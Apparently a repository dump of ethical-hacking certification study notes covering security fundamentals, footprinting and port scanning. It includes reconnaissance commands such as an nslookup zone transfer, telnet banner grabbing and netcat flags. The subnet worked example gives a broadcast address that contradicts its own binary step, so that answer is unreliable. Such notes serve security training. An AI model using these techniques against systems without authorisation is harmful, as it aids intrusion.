├── 01-essential_knowledge.md ├── 02-reconnaissance_and_footprinting.md ├── 03-scanning_and_enumeration.md ├── 04-sniffing_and_evasion.md ├── 05-system_hacking.md ├── 06-web_server_and_web_application_hacking.md ├── 07-wireless_network_hacking.md ├── 08-mobile_and_iot_hacking.md ├── 09-security_in_cloud_computing.md ├── 10-malware_and_other_attacks.md ├── 11-cryptography.md ├── 12-social_engineering.md ├── 13-pen_testing.md ├── LICENSE ├── README.md └── SUMMARY.md /01-essential_knowledge.md: -------------------------------------------------------------------------------- 1 | # 01-Essential Knowledge 2 | 3 | ## Table of Contents 4 | 5 | - [Essential Knowledge](01-essential_knowledge.md#essential-knowledge) 6 | - [OSI Model \(Open System Interconnection\)](01-essential_knowledge.md#osi-model-open-system-interconnection) 7 | - [TCP/IP Model](01-essential_knowledge.md#tcpip-model) 8 | - [CIA Triad](01-essential_knowledge.md#cia-triad) 9 | - [Vulnerability](01-essential_knowledge.md#vulnerability) 10 | - [Vulnerability Categories](01-essential_knowledge.md#vulnerability-categories) 11 | - [Vulnerability Management Tools](01-essential_knowledge.md#vulnerability-management-tools) 12 | - [Security Controls](01-essential_knowledge.md#security-controls) 13 | - [Types of physical security controls](01-essential_knowledge.md#types-of-physical-security-controls) 14 | - [Security Incident and Event Management \(SIEM\)](01-essential_knowledge.md#security-incident-and-event-management-siem) 15 | - [Network Security Zones](01-essential_knowledge.md#network-security-zones) 16 | - [Security Policies](01-essential_knowledge.md#security-policies) 17 | - [Policy Categorizations](01-essential_knowledge.md#policy-categorizations) 18 | - [Types of Policy](01-essential_knowledge.md#types-of-policy) 19 | - [Risk Management](01-essential_knowledge.md#risk-management) 20 | - [5 Ways To Manage Risk](01-essential_knowledge.md#5-ways-to-manage-risk) 21 | - [Threat Modeling](01-essential_knowledge.md#threat-modeling) 22 | - [Business Analysis](01-essential_knowledge.md#business-analysis) 23 | - [Hacking](01-essential_knowledge.md#hacking) 24 | - [Types of Hacker](01-essential_knowledge.md#types-of-hacker) 25 | - [Types of Attack](01-essential_knowledge.md#types-of-attack) 26 | - [Hacking Phases](01-essential_knowledge.md#hacking-phases) 27 | - [Laws and Standards](01-essential_knowledge.md#laws-and-standards) 28 | - [Categories](01-essential_knowledge.md#categories) 29 | - [Standards](01-essential_knowledge.md#standards) 30 | - [ISO/IEC 27001:2013](01-essential_knowledge.md#isoiec-270012013) 31 | - [PCI DSS \(Payment Card Industry Data Security Standard\)](01-essential_knowledge.md#pci-dss-payment-card-industry-data-security-standard) 32 | - [Laws](01-essential_knowledge.md#laws) 33 | - [HIPAA \(Health Insurance Portability and Accountability Act\)](01-essential_knowledge.md#hipaa-health-insurance-portability-and-accountability-act) 34 | - [SOX \(Sarbanes Oxley Act\)](01-essential_knowledge.md#sox-sarbanes-oxley-act) 35 | - [DMCA \(The Digital Millennium Copyright ACT\)](01-essential_knowledge.md#dmca-the-digital-millennium-copyright-act) 36 | - [FISMA \(Federal Information Security Modernization Act Of 2002\)](01-essential_knowledge.md#fisma-federal-information-security-modernization-act-of-2002) 37 | - [NIST-800-53](01-essential_knowledge.md#nist-800-53) 38 | - [Terms to Know](01-essential_knowledge.md#terms-to-know) 39 | 40 | ## Essential Knowledge 41 | 42 | ### OSI Model \(Open System Interconnection\) 43 | 44 | | Layer | Description | Technologies | Data Unit | 45 | | :---- | :----------- | :-------------------- | :-------- | 46 | | 1 | Physical | USB, Bluetooth | Bit | 47 | | 2 | Data Link | ARP, PPP, MAC, STP | Frame | 48 | | 3 | Network | IP, IPsec, ICMP | Packet | 49 | | 4 | Transport | TCP, UDP | Segment | 50 | | 5 | Session | SCP, SOCKS, NetBIOS | Data | 51 | | 6 | Presentation | AFP, MIME, SSL | Data | 52 | | 7 | Application | FTP, HTTP, SMTP, SNMP | Data | 53 | 54 | ### TCP/IP Model 55 | 56 | | Layer | Description | OSI Layer Equivalent | 57 | | :---- | :------------- | :------------------- | 58 | | 1 | Network Access | 1, 2 | 59 | | 2 | Internet | 3 | 60 | | 3 | Transport | 4 | 61 | | 4 | Application | 5-7 | 62 | 63 | ### CIA Triad 64 | 65 | - **Confidentiality**: passwords, encryption 66 | - **Integrity**: hashing, digital signatures 67 | - **Availability**: anti-DoS solutions 68 | 69 | Confidentiality != Authentication 70 | 71 | ### Vulnerability 72 | 73 | - **Common Vulnerability Scoring System** \(CVSS\): placing numerical score based on severity 74 | - **National Vulnerability Database** \(NVD\): US government repository of vulnerabilities 75 | 76 | #### Vulnerability Categories 77 | 78 | - **Default installation**: failure to change settings in an application that come by default 79 | - **Default passwords**: leaving default passwords that come with system/application 80 | - **Misconfiguration**: improperly configuring a service or application 81 | - **Missing patches**: systems that have not been patched 82 | - **Design flaws**: flaws inherent to system design such as encryption and data validation 83 | - **Operating System Flaws**: flaws specific to each OS 84 | - **Buffer overflow**: code execution flaw, eg: EIP \(Extended Instruction Pointer\) register 85 | 86 | #### Vulnerability Management Tools 87 | 88 | - Nessus 89 | - Qualys 90 | - GFI Languard 91 | - Nikto 92 | - OpenVAS 93 | - Retina CS 94 | 95 | ### Security Controls 96 | 97 | | Description | Examples | 98 | | :------------------------- | :-------------------------------------------- | 99 | | Physical | Guards, lights, cameras | 100 | | Technical | Encryption, smart cards, access control lists | 101 | | Administrative/Operational | Training awareness, policies, procedures | 102 | 103 | #### Types of physical security controls 104 | 105 | - **Preventive**: controls used to **stop potential attacks** by preventing users from performing specific actions, such as encryption and authentication 106 | - **Detective**: controls used to **monitor and alert** on malicious or unauthorized activity, such as IDS's and CCTV feeds monitored in real life, record any intrusion attempts 107 | - **Deterrent**: controls used to **discourage potential attackers and send warning messages to the attackers**, such as signs that warn possible attackers about the alarm system and monitoring in place 108 | - **Compensating**: controls used to **supplement directive controls** when the intended control is failed, such as administrator reviewing logs files for violations of company policy 109 | - **Corrective**: controls designed to **fix things after an attack** has been discovered and stopped 110 | - **Recovery**: controls used to **recover from security violations** and restore information and systems to a persistent state 111 | 112 | #### Security Incident and Event Management \(SIEM\) 113 | 114 | - Aggregating and providing search for log data 115 | - Functions related to a security operations center \(SOC\) 116 | - Identifying 117 | - Monitoring 118 | - Recording 119 | - Auditing 120 | - Analyzing 121 | 122 | #### Network Security Zones 123 | 124 | - **Internet**: uncontrollable 125 | - **Internet DMZ**: controlled buffer network 126 | - **Production Network Zone**: very restricted; controls direct access from uncontrolled zones; no users 127 | - **Intranet Zone**: controlled; has little to no heavy restrictions 128 | - **Management Network Zone**: might find VLANs and IPsec; highly secured; strict policies 129 | 130 | ### Security Policies 131 | 132 | - **Access Control**: what resources are protected and who can access them 133 | - **MAC** \(Mandatory Access Control\): access set by an administrator 134 | - **DAC** \(Discretionary Access Control\): allowing users to give access to resources that they own and control 135 | - **Information Security**: what can systems be used for 136 | - **Information Protection**: defining data sensitivity levels 137 | - **Password**: how long, characters required, etc. 138 | - **E-Mail**: proper and allowable use of email systems 139 | - **Information Audit**: defining the framework used for auditing 140 | 141 | #### Policy Categorizations 142 | 143 | - **Standard**: mandatory rules to achieve consistency 144 | - **Baseline**: providing the minimum security necessary, can compare to future states monitored over time to see what security and configuration changes have been made 145 | - **Procedure**: step-by-step instructions 146 | - **Guideline**: flexible or recommended actions 147 | 148 | #### Types of Policy 149 | 150 | - **Promiscuous**: wide open 151 | - **Permissive**: blocking only known dangerous things 152 | - **Prudent**: blocking most and only allows things for business purposes 153 | - **Paranoid**: locking everything down 154 | 155 | ### Risk Management 156 | 157 | - Risk identification 158 | - Risk assessment 159 | - Assessing the organization's risks and estimates the likelihood and impact of those risks 160 | - Assigning priorities for risk mitigation and implementation plans, which help to determine the quantitative and qualitative value of risk 161 | - Risk treatment 162 | - Risk tracking 163 | - Risk review 164 | 165 | #### 5 Ways To Manage Risk 166 | 167 | - Accept 168 | - Avoid 169 | - Transfer 170 | - Mitigate 171 | - Exploit 172 | 173 | Transfer != Delegate 174 | 175 | #### Threat Modeling 176 | 177 | - Identify security objectives 178 | - Application Overview 179 | - Decompose application 180 | - Identify threats 181 | - Identify vulnerabilities 182 | 183 | #### Business Analysis 184 | 185 | - Business Impact Analysis \(BIA\): process that identifies and evaluates the potential effects that man-made or natural events will have on business operations, identifies the critical systems that would be affected by them 186 | - Maximum Tolerable Downtime \(MTD\) 187 | - Business Continuity Plan \(BCP\): procedure for maintaining businesses during any event 188 | - Disaster Recovery Plan \(DRP\) 189 | - Annualized Loss Expectancy \(ALE\) 190 | - Annual Rate of Occurrence \(ARO\) 191 | - Single Loss Expectancy \(SLE\) 192 | - `ALE = SLE * ARO` 193 | - User Behavior Analysis \(UBA\): tracking users and extrapolating data in light of malicious activity 194 | 195 | ### Hacking 196 | 197 | #### Types of Hacker 198 | 199 | - **White Hat**: ethical hacker 200 | - **Black Hat**: hacker that seeks to perform malicious activities 201 | - **Gray Hat**: hacker that performs good or bad activities but do not have the permission of the organization they are hacking against 202 | - **Hacktivist**: someone who hacks for a cause 203 | - **Suicide Hacker**: not caring about any impunity to themselves 204 | - **Cyberterrorist**: motivated by religious or political beliefs to create fear or disruption 205 | - **State-Sponsored Hacker**: hacker that is hired by a government 206 | - **Script Kiddie**: uneducated in security methods, but uses tools that are freely available to perform malicious activities 207 | - **Cracker**: using tools for personal gain or destructive purposes 208 | - **Ethical Hacker** 209 | - Employing tools that hackers use with a customer's permission 210 | - Always obtaining an agreement from the client with specific objectives **before** any testing is done 211 | 212 | #### Types of Attack 213 | 214 | - **Operating System**: targeting OS flaws or security issues inside such as guest accounts or default passwords 215 | - **Application Level**: targeting on programming code and software logic 216 | - **Shrink-Wrap Code**: taking advantage of built-in code or scripts 217 | - **Misconfiguration**: taking advantage of systems that are misconfigured due to improper configuration or default configuration 218 | - **Infowar**: using of information and communication techniques to take competitive advantages over an opponent 219 | 220 | #### Hacking Phases 221 | 222 | 1. **Reconnaissance**: gathering evidence about targets 223 | 2. **Scanning & Enumeration**: obtaining more in-depth information about targets 224 | 3. **Gaining Access**: leveled attacks in order to gain access to a system 225 | 4. **Maintaining Access**: items in place to ensure future access 226 | 5. **Covering Tracks**: steps taken to conceal success and intrusion 227 | 228 | ### Laws and Standards 229 | 230 | #### Categories 231 | 232 | - **Criminal**: laws that protect public safety and usually have jail time attached 233 | - **Civil**: private rights and remedies 234 | - **Common**: laws that are based on societal customs 235 | 236 | #### Standards 237 | 238 | ##### ISO/IEC 27001:2013 239 | 240 | - Based on the British BS7799 standard, focuses on security governance 241 | - PDCA cycle is Plan, Do, Check and Act 242 | 243 | ##### PCI DSS \(Payment Card Industry Data Security Standard\) 244 | 245 | - Standard for organizations handling Credit Cards, ATM cards and other POS cards 246 | - 6 major objectives: 247 | 1. Build and Maintain a Secure Network and Systems 248 | 2. Protect card holder Data 249 | 3. Maintain a Vulnerability Management Program 250 | 4. Implement Strong Access Control Measures 251 | 5. Regularly Monitor and Test Networks 252 | 6. Maintain an Information Security Policy 253 | 254 | #### Laws 255 | 256 | ##### HIPAA \(Health Insurance Portability and Accountability Act\) 257 | 258 | - A law that sets privacy standards to protect patient medical records and health information shared between doctors, hospitals and insurance providers, requires employers standard national numbers to identify them on standard transactions 259 | 260 | ##### SOX \(Sarbanes Oxley Act\) 261 | 262 | - A law that requires publicly traded companies to submit to independent audits and to properly disclose financial information, contains 11 titles 263 | 264 | ##### DMCA \(The Digital Millennium Copyright ACT\) 265 | 266 | - A United States copyright law that implements two 1996 treaties of the World Intellectual Property Organization \(WIPO\) 267 | 268 | ##### FISMA \(Federal Information Security Modernization Act Of 2002\) 269 | 270 | - A law to codify the authority of the Department of Homeland Security with regard to implementation of information security policies 271 | 272 | ##### NIST-800-53 273 | 274 | - Catalogs security and privacy controls for federal information systems, created to help implementation of FISMA 275 | - 5 functions are Identify, Protect, Detect, Response and Recover 276 | 277 | ### Terms to Know 278 | 279 | - **Hack value**: perceived value or worth of a target as seen by the attacker 280 | - **Zero-day attack**: attack that occurs before a vendor knows or is able to patch a flaw 281 | - **Daisy Chaining**: gaining access to one network and/or computer then using the same information to gain access to multiple networks and computers that contain desirable information 282 | - **Doxing**: searching for and publishing information about an individual usually with a malicious intent 283 | - **Enterprise Information Security Architecture** \(EISA\): a set of requirements, processes, principles and models that determines how systems work within an organization 284 | - **Incident management**: dealing with specific incidents to mitigate the attack, resolving and preventing the future recurrence of a security incident 285 | - **Fingerprinting**: another word for port sweeping and enumeration 286 | - **Defense-in-Depth**: a security strategy in which security professionals use several protection layers throughout an information system 287 | - **Competitive Intelligence**: information gathered by businesses about competitors 288 | -------------------------------------------------------------------------------- /02-reconnaissance_and_footprinting.md: -------------------------------------------------------------------------------- 1 | # 02-Reconnaissance and Footprinting 2 | 3 | ## Table of Contents 4 | 5 | - [Reconnaissance and Footprinting](02-reconnaissance_and_footprinting.md#reconnaissance-and-footprinting) 6 | - [Types of Footprinting](02-reconnaissance_and_footprinting.md#types-of-footprinting) 7 | - [Search Engines](02-reconnaissance_and_footprinting.md#search-engines) 8 | - [Website Footprinting](02-reconnaissance_and_footprinting.md#website-footprinting) 9 | - [Email Footprinting](02-reconnaissance_and_footprinting.md#email-footprinting) 10 | - [DNS Footprinting](02-reconnaissance_and_footprinting.md#dns-footprinting) 11 | - [Types of DNS Record](02-reconnaissance_and_footprinting.md#types-of-dns-record) 12 | - [SOA Record Fields](02-reconnaissance_and_footprinting.md#soa-record-fields) 13 | - [Regional Internet registtry \(RIR\)](02-reconnaissance_and_footprinting.md#regional-internet-registtry-rir) 14 | - [nslookup](02-reconnaissance_and_footprinting.md#nslookup) 15 | - [dig](02-reconnaissance_and_footprinting.md#dig) 16 | - [Network Footprinting](02-reconnaissance_and_footprinting.md#network-footprinting) 17 | - [OS Fingerprinting](02-reconnaissance_and_footprinting.md#os-fingerprinting) 18 | - [Banner Grabbing](02-reconnaissance_and_footprinting.md#banner-grabbing) 19 | - [Telnet](02-reconnaissance_and_footprinting.md#telnet) 20 | - [Netcat](02-reconnaissance_and_footprinting.md#netcat) 21 | - [Other Tools](02-reconnaissance_and_footprinting.md#other-tools) 22 | 23 | ## Reconnaissance and Footprinting 24 | 25 | - Looking for high-level information on a target 26 | 27 | ### Types of Footprinting 28 | 29 | - **Active**: requiring attacker to touch the device or network 30 | - Social engineering and other communications that require interaction with target 31 | - **Passive**: collecting information from publicly available sources 32 | - Websites, DNS records, business information databases 33 | - **Anonymous**: information gathering without revealing anything about yourself 34 | - **Pseudonymous**: making someone else take the blame for your actions 35 | 36 | ### Search Engines 37 | 38 | - **Alexa.com**: resource for statistics about websites 39 | - **NetCraft**: information about website and possibly OS info, used to discover restricted URLs 40 | - **Job Search Sites**: information about technologies can be gleaned from job postings 41 | - **Google** 42 | - filetype: look for file types 43 | - index of directory listings 44 | - info: contain Google's information about the page 45 | - intitle: string in title 46 | - inurl: string in url 47 | - link: find linked pages 48 | - related: find similar pages 49 | - site: find pages specific to that site 50 | - **EDGAR**: database maintained by SEC and includes filing information from public companies 51 | - **Shodan**: search engine that shows devices connected to the Internet 52 | - **Whois**: obtain registration information for the domain 53 | 54 | ### Website Footprinting 55 | 56 | - **Web mirroring**: allowing for discrete testing offline 57 | - HTTrack 58 | - Wget 59 | - WebRipper 60 | - Teleport Pro 61 | - Backstreet Browser 62 | - **Archive.org**: providing cached websites from various dates which possibly have sensitive information that has been now removed 63 | - **Web Spiders**: obtaining information from the website such as pages, etc. 64 | 65 | ### Email Footprinting 66 | 67 | - **Email header**: may show servers and where the location of those servers are 68 | - **Email tracking**: services can track various bits of information including the IP address of where it was opened, where it went, etc. 69 | 70 | ### DNS Footprinting 71 | 72 | - Zone transfer replicates all records, happening when a primary server's serial number higher than the secondary's serial number 73 | - **Name resolvers**: answering requests 74 | - **Authoritative Servers**: holding all records for a namespace, where all records for a domain belonging to an organization or enterprise reside 75 | 76 | #### Types of DNS Record 77 | 78 | | Name | Description | Purpose | 79 | | :---- | :----------------- | :--------------------------------------------- | 80 | | SRV | Service | Points to a specific service | 81 | | SOA | Start of Authority | Indicates the authoritative NS for a namespace | 82 | | PTR | Pointer | Maps an IP to a hostname | 83 | | NS | Nameserver | Lists the nameservers for a namespace | 84 | | MX | Mail Exchange | Lists email servers, low number high priority | 85 | | CNAME | Canonical Name | Maps a name to an A reccord | 86 | | A | Address | Maps an hostname to an IP address | 87 | | AAAA | IPv6 address | Maps an hostname to an IPv6 address | 88 | 89 | ##### SOA Record Fields 90 | 91 | - **Source Host**: hostname of the primary DNS 92 | - **Contact Email**: email for the person responsible for the zone file 93 | - **Serial Number**: revision number that increments with each change 94 | - **Refresh Time**: time in which an update should occur 95 | - **Retry Time**: time that a NS should wait on a failure 96 | - **Expire Time**: time in which a zone transfer is allowed to complete 97 | - **TTL** \(Time to Live\): minimum TTL for records within the zone 98 | 99 | #### Regional Internet registtry \(RIR\) 100 | 101 | - **AfriNIC**: Africa 102 | - **APNIC**: Asia Pacific 103 | - **ARIN**: North America 104 | - **LACNIC**: Latin America 105 | - **RIPE**: Europe, Middle East 106 | 107 | #### nslookup 108 | 109 | - Perform DNS queries: `nslookup [-options] [hostname]` 110 | - Determine if the entry is present in DNS cache with option: `-norecursive` 111 | - Provide the type of computer and OS a host: `set type=HINFO` 112 | - Interactive zone transfer 113 | 114 | ```text 115 | nslookup 116 | server 117 | set type = any 118 | ls -d domainname.com 119 | ``` 120 | 121 | #### dig 122 | 123 | - Unix-based command like nslookup 124 | - `dig @server name type` 125 | 126 | ### Network Footprinting 127 | 128 | - IP address range can be obtained from regional registrar 129 | - Use traceroute to find intermediary servers 130 | - traceroute uses ICMP ECHO in Windows, hop count of 1 131 | - traceroute maps the route of a packet travel: manipulates the value of time to live \(TTL\) within packet to elicit a time exceeded in transit message 132 | - TTL is incremented by 1 for each hop discovered 133 | - Windows command: `tracert` 134 | - Linux command: `traceroute` 135 | 136 | ### OS Fingerprinting 137 | 138 | - **Active**: sending crafted packets to the target 139 | - **Passive**: sniffing network traffic for things such as TTL windows, DF \(Don't Fragment\) flags and ToS \(Type of Service\) fields 140 | 141 | ### Banner Grabbing 142 | 143 | - Getting information about OS or specific server info \(such as web server, mail server, etc.\) 144 | - **Active**: sending specially crafted packets and comparing responses to determine OS 145 | - **Passive**: reading error messages, sniffing traffic or looking at page extensions 146 | 147 | #### Telnet 148 | 149 | - Easy way to banner grabbing, connects via telnet on port: 150 | 151 | ```text 152 | telnet webserveraddress 80 153 | HEAD / HTTP/1.0 154 | ``` 155 | 156 | #### Netcat 157 | 158 | - `nc ` 159 | 160 | | Flag | Function | 161 | | :--- | :------------------------ | 162 | | -4 | IPv4 | 163 | | -6 | IPv6 | 164 | | -z | Report only open ports | 165 | | -u | Scan for UDP ports | 166 | | -l | Listen on a specific port | 167 | | -w | Timeout seconds | 168 | | -p | Specify source port | 169 | 170 | ### Other Tools 171 | 172 | - **OSRFramework**: uses open source intelligence to get information about target 173 | - **Metagoofil**: uses Google hacks to find information in meta tags 174 | - **Maltego**: social Engineering Tools 175 | -------------------------------------------------------------------------------- /03-scanning_and_enumeration.md: -------------------------------------------------------------------------------- 1 | # 03-Scanning and Enumeration 2 | 3 | ## Table of Contents 4 | 5 | - [Scanning and Enumeration](03-scanning_and_enumeration.md#scanning-and-enumeration) 6 | - [Scanning](03-scanning_and_enumeration.md#scanning) 7 | - [Data transition methods](03-scanning_and_enumeration.md#data-transition-methods) 8 | - [Scanning Methodology](03-scanning_and_enumeration.md#scanning-methodology) 9 | - [TCP/IP \(Transmission Control Protocol/Internet Protocol\)](03-scanning_and_enumeration.md#tcpip-transmission-control-protocolinternet-protocol) 10 | - [TCP Flags](03-scanning_and_enumeration.md#tcp-flags) 11 | - [TCP Handshake](03-scanning_and_enumeration.md#tcp-handshake) 12 | - [Port Numbers](03-scanning_and_enumeration.md#port-numbers) 13 | - [Subnetting](03-scanning_and_enumeration.md#subnetting) 14 | - [ICMP \(Internet Control Message Protocol\)](03-scanning_and_enumeration.md#icmp-internet-control-message-protocol) 15 | - [Message Types](03-scanning_and_enumeration.md#message-types) 16 | - [Ping scanning tools](03-scanning_and_enumeration.md#ping-scanning-tools) 17 | - [Vulnerability Scanning](03-scanning_and_enumeration.md#vulnerability-scanning) 18 | - [Enumeration](03-scanning_and_enumeration.md#enumeration) 19 | - [NetBIOS \(Network Basic Input/Output System\) Enumeration](03-scanning_and_enumeration.md#netbios-network-basic-inputoutput-system-enumeration) 20 | - [NetBIOS code and meaning](03-scanning_and_enumeration.md#netbios-code-and-meaning) 21 | - [SNMP \(Simple Network Management Protocol\) Enumeration](03-scanning_and_enumeration.md#snmp-simple-network-management-protocol-enumeration) 22 | - [SMTP \(Simple Mail Transfer Protocol\) Enumeration](03-scanning_and_enumeration.md#smtp-simple-mail-transfer-protocol-enumeration) 23 | - [NTP \(Network Time Protocol\) Enumeration](03-scanning_and_enumeration.md#ntp-network-time-protocol-enumeration) 24 | - [LDAP \(Lightweight Directory Access Protocol\) Enumeration](03-scanning_and_enumeration.md#ldap-lightweight-directory-access-protocol-enumeration) 25 | - [Nmap](03-scanning_and_enumeration.md#nmap) 26 | - [Full connect scan](03-scanning_and_enumeration.md#full-connect-scan) 27 | - [TCP SYN scan \(Stealth scan\)](03-scanning_and_enumeration.md#tcp-syn-scan-stealth-scan) 28 | - [Responses to Full and SYN scan probe](03-scanning_and_enumeration.md#responses-to-full-and-syn-scan-probe) 29 | - [Inverse TCP flag scan \(FIN, URG and PSH scanning\)](03-scanning_and_enumeration.md#inverse-tcp-flag-scan-fin-urg-and-psh-scanning) 30 | - [NULL scan](03-scanning_and_enumeration.md#null-scan) 31 | - [Xmas scan](03-scanning_and_enumeration.md#xmas-scan) 32 | - [Responses to NULL, FIN, or Xmas scan](03-scanning_and_enumeration.md#responses-to-null-fin-or-xmas-scan) 33 | - [TCP ACK scan](03-scanning_and_enumeration.md#tcp-ack-scan) 34 | - [IDLE Scan](03-scanning_and_enumeration.md#idle-scan) 35 | - [Nmap Switches](03-scanning_and_enumeration.md#nmap-switches) 36 | - [hping](03-scanning_and_enumeration.md#hping) 37 | - [hping switch and description](03-scanning_and_enumeration.md#hping-switch-and-description) 38 | 39 | ## Scanning and Enumeration 40 | 41 | ### Scanning 42 | 43 | - Discovering systems on the network and looking at what ports are open as well as applications that may be running 44 | 45 | #### Data transition methods 46 | 47 | - **Connectionless Communication**: UDP \(User Datagram Protocol\) packets are sent without creating a connection. Examples are TFTP, DNS \(lookups only\) and DHCP 48 | - **Connection-Oriented Communication**: TCP packets require a connection due to the size of the data being transmitted and to ensure deliverability 49 | 50 | #### Scanning Methodology 51 | 52 | 1. **Check for live systems**: ping or other type of way to determine live hosts 53 | 2. **Check for open ports**: once you know live host IPs, scan them for listening ports 54 | 3. **Scan beyond IDS**: if needed, use methods to scan beyond the detection systems 55 | 4. **Perform banner grabbing**: grabbing from servers as well as perform OS fingerprinting 56 | 5. **Scan for vulnerabilities**: using tools to look at the vulnerabilities of open systems 57 | 6. **Draw network diagrams**: showing logical and physical pathways into networks 58 | 7. **Prepare proxies**: obscuring efforts to keep you hidden 59 | 60 | #### TCP/IP \(Transmission Control Protocol/Internet Protocol\) 61 | 62 | ##### TCP Flags 63 | 64 | | Flag | Name | Decimal number | Function | 65 | | :--- | :------------- | :------------- | :------------------------------------------------------------------------------- | 66 | | SYN | Synchronize | 2 | Set during initial communication. Negotiating of parameters and sequence numbers | 67 | | ACK | Acknowledgment | 16 | Set as an acknowledgment to the SYN flag. Always set after initial SYN | 68 | | RST | Reset | 4 | Forces the termination of a connection \(in both directions\) | 69 | | FIN | Finish | 1 | Ordered close to communications | 70 | | PSH | Push | 8 | Forces the delivery of data without concern for buffering | 71 | | URG | Urgent | 32 | Data inside is being sent out of band. Example is canceling a message | 72 | 73 | - How to remember TCP Flag's number 74 | 75 | ```text 76 | UAPRSF 77 | 000001 FIN 78 | 000010 SYN 79 | 000100 RST 80 | 001000 PSH 81 | 010000 ACK 82 | 100000 URG 83 | ``` 84 | 85 | ##### TCP Handshake 86 | 87 | - Connection establishment: SYN -> SYN-ACK -> ACK 88 | - Connection termination: FIN -> ACK-FIN -> ACK 89 | - Sequence and Acknowledgment numbers calculation: 90 | 91 | ```text 92 | A.Seq = B.Ack 93 | A.Ack = B.Seq + B.Len + phantom byte 94 | 95 | - Connection establishment: 96 | 97 | -------- -------- 98 | |Client| |Server| 99 | -------- -------- 100 | │ │ 101 | │ SYN [Seq#=0, Ack#=0] │ 102 | │------------------------>│ 103 | │ │ 104 | │SYN, ACK [Seq#=0, Ack#=1]│ 105 | │<------------------------│ 106 | │ │ 107 | │ ACK [Seq#=1, Ack#=1] │ 108 | │------------------------>│ 109 | -------- -------- 110 | |Client| |Server| 111 | -------- -------- 112 | 113 | (SYN as 1 phantom byte) 114 | 115 | - Data transfer: 116 | 117 | -------- -------- 118 | |Client| |Server| 119 | -------- -------- 120 | │ │ 121 | │ PSH, ACK [Seq#=1, Ack#=1, Len=376] │ 122 | │----------------------------------->│ 123 | │ │ 124 | │ ACK [Seq#=1, Ack#=377] │ 125 | │<-----------------------------------│ 126 | │ │ 127 | │PSH, ACK [Seq#=1, Ack#=377, Len=270]│ 128 | │<-----------------------------------│ 129 | │ │ 130 | │ ACK [Seq#=377, Ack#=271] │ 131 | │----------------------------------->│ 132 | -------- -------- 133 | |Client| |Server| 134 | -------- -------- 135 | 136 | - Connection termination (4-way TCP termination): 137 | 138 | - Server ends TCP session 139 | 140 | -------- -------- 141 | |Client| |Server| 142 | -------- -------- 143 | │ │ 144 | │FIN, ACK [Seq#=271, Ack#=377]│ 145 | │<----------------------------│ 146 | │ │ 147 | │ ACK [Seq#=377, Ack#=272] │ 148 | │---------------------------->│ 149 | -------- -------- 150 | |Client| |Server| 151 | -------- -------- 152 | 153 | - Client ends TCP session 154 | 155 | -------- -------- 156 | |Client| |Server| 157 | -------- -------- 158 | │ │ 159 | │FIN, ACK [Seq#=377, Ack#=272]│ 160 | │---------------------------->│ 161 | │ │ 162 | │ ACK [Seq#=272, Ack#=378] │ 163 | │<----------------------------│ 164 | -------- -------- 165 | |Client| |Server| 166 | -------- -------- 167 | 168 | (FIN as 1 phantom byte) 169 | ``` 170 | 171 | ##### Port Numbers 172 | 173 | - **Internet Assigned Numbers Authority** \(IANA\): maintaining Service Name and Transport Protocol Port Number Registry which lists all port number reservations 174 | - Ranges 175 | - **Well-known ports**: 0-1023 \(2^10\) 176 | - **Registered ports**: 1024-49,151 177 | - **Dynamic ports**: 49,152-65,535 \(2^16\) 178 | - A service is said to be **listening** for a port when it has that specific port open 179 | - Once a service has made a connection, the port is in an **established** state 180 | - Netstat: showing open ports on computer 181 | - Display connections in numerical form: `netstat -an` 182 | - Display executables tied to the open port \(admin only\): `netstat -b` 183 | - Some important port numbers 184 | 185 | | Port Number | Protocol | Transport Protocol | 186 | | :---------- | :---------------- | :----------------- | 187 | | 20/21 | FTP | TCP | 188 | | 22 | SSH | TCP | 189 | | 23 | Telnet | TCP | 190 | | 25 | SMTP | TCP | 191 | | 53 | DNS name lookup | UDP | 192 | | 53 | DNS zone transfer | TCP | 193 | | 67 | DHCP | UDP | 194 | | 69 | TFTP | UDP | 195 | | 80 | HTTP | TCP | 196 | | 88 | Kerberos | TCP/UDP | 197 | | 110 | POP3 | TCP | 198 | | 123 | NTP | TCP/UDP | 199 | | 135 | RPC | TCP | 200 | | 137-139 | NetBIOS \(SMB\) | TCP/UDP | 201 | | 143 | IMAP | TCP | 202 | | 161/162 | SNMP | UDP | 203 | | 389 | LDAP | TCP/UDP | 204 | | 443 | HTTPS | TCP | 205 | | 445 | SMB | TCP/UDP | 206 | | 514 | SYSLOG | UDP | 207 | | 546 | dhcpv6 | TCP/UDP | 208 | | 631 | IPP \(Printing \) | TCP/UDP | 209 | | 3268 | Global Catalog | TCP/UDP | 210 | | 5355 | LLMNR | UDP | 211 | 212 | ##### Subnetting 213 | 214 | - **IPv4 Main Address Types** 215 | - **Unicast**: acted on by a single recipient 216 | - **Multicast**: acted on by members of a specific group 217 | - **Broadcast**: acted on by everyone on the network 218 | - **Limited**: delivered to every system in the domain \(255.255.255.255\) 219 | - **Directed**: delivered to all devices on a subnet and use that broadcast address 220 | - **Private addresses**: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 221 | - **Subnet mask**: determining how many address available on a specific subnet, also determining whether a destination system is on the same network as the source, represented by three methods: 222 | - **Decimal**: 255.240.0.0 223 | - **Binary**: 11111111.11110000.00000000.00000000 224 | - **CIDR** \(Classless Inter-Domain Routing\): x.x.x.x/12 \(where x.x.x.x is an ip address on that range\) 225 | - Network address: 1st address in the range, subnet mask bits + all 0s 226 | - Broadcast address: last address in the range, subnet mask bits + all 1s 227 | - Any other combination indicates an address in the range 228 | - Subnet calculation: 229 | 230 | ```text 231 | IP address: 130.192.202.202 232 | Subnet mask: 255.255.248.0 233 | 234 | - Step 1: 235 | IP | 10000010 11000000 11001010 11001010 236 | Subnet mask | 11111111 11111111 11111000 00000000 237 | 238 | - Step 2: 239 | Network Address | 10000010 11000000 11001 240 | Broadcast Address | 10000010 11000000 11001 241 | 242 | - Step 3: 243 | Network Address | 10000010 11000000 11001000 00000000 244 | Broadcast Address | 10000010 11000000 11001111 11111111 245 | 246 | - Step 4: 247 | Network Address: 130.192.200.0 248 | Broadcast Address: 130.192.200.255 249 | ``` 250 | 251 | - Decimal to Binary: 252 | 253 | ```text 254 | 0 0 0 0 0 0 0 0 255 | 128 64 32 16 8 4 2 1 256 | ``` 257 | 258 | #### ICMP \(Internet Control Message Protocol\) 259 | 260 | - ICMP is the easiest way to scan for live systems is through ICMP, but sometimes blocked on hosts that are actually live 261 | - Payload of an ICMP message can be anything \(RFC never set what it was supposed to be\); allows for covert channels 262 | - **Ping sweep**: easiest method to identify hosts 263 | - **ICMP ECHO scanning**: sending an ICMP 